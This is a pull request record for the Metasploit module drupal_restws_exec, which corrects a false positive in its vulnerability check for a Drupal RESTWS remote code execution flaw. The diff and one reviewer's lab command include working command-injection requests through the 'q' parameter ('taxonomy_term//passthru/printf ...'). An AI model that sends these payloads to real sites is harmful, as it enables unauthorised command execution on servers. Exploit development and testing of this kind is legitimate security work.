### PR TITLE
Fix drupal_restws_exec check method false positive

### PR DESCRIPTION
**Pull request by wvu**
For #7108.
- [x] Install Drupal 7.5: https://ftp.drupal.org/files/projects/drupal-7.5.tar.gz
- [x] Run `check`
- [x] See that the target is not vulnerable (false positive was here)
- [x] Install Entity API (required for RESTWS): https://ftp.drupal.org/files/projects/entity-7.x-1.7.tar.gz
- [x] Install RESTWS 2.5: https://ftp.drupal.org/files/projects/restws-7.x-2.5.tar.gz
- [x] Run `check`
- [x] See that the target is vulnerable

### CODE REVIEW

**Comment by zeknox** [comment]
This check() method appears to be working properly for me while testing.  Shows vulnerable when restws is enabled, does not show vulnerable when restws is disabled.

File: modules/exploits/unix/webapp/drupal_restws_exec.rb [hunk 1]
```diff
@@ -59,7 +59,7 @@ def check
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'vars_get' => {
-        'q' => "taxonomy_vocabulary//passthru/echo #{r}"
+        'q' => "taxonomy_vocabulary//passthru/printf '#{Rex::Text.to_octal(r)}'"
```
Comment (wvu-r7) [inline modules/exploits/unix/webapp/drupal_restws_exec.rb]: Btw, ```taxonomy_term``` also works.

Comment (zeknox) [inline modules/exploits/unix/webapp/drupal_restws_exec.rb]: Are you saying that the taxonomy_term url is also vulnerable to the RCE?  Are there other URLs as well that we should be aware of?

Comment (wvu-r7) [inline modules/exploits/unix/webapp/drupal_restws_exec.rb]: That's the only other one I've tested.

```
wvu@kharak:~$ http -b "192.168.33.146/drupal-7.5/?q=taxonomy_term//passthru/printf '\166\165\154\156\145\162\141\142\154\145'"
vulnerable

wvu@kharak:~$ 
```

Comment (wvu-r7) [inline modules/exploits/unix/webapp/drupal_restws_exec.rb]: I didn't actually look at the bug yet... lol. Just poking the app.

**Comment by wvu-r7** [comment]
I am going to merge this myself.

**Comment by wchen-r7** [comment]
# Release Notes

**Improve drupal_restws_exec check method** - This updates the check method for module drupal_restws_exec.rb. It uses the print command instead of echo to reduce false positives.

**Pull request merged**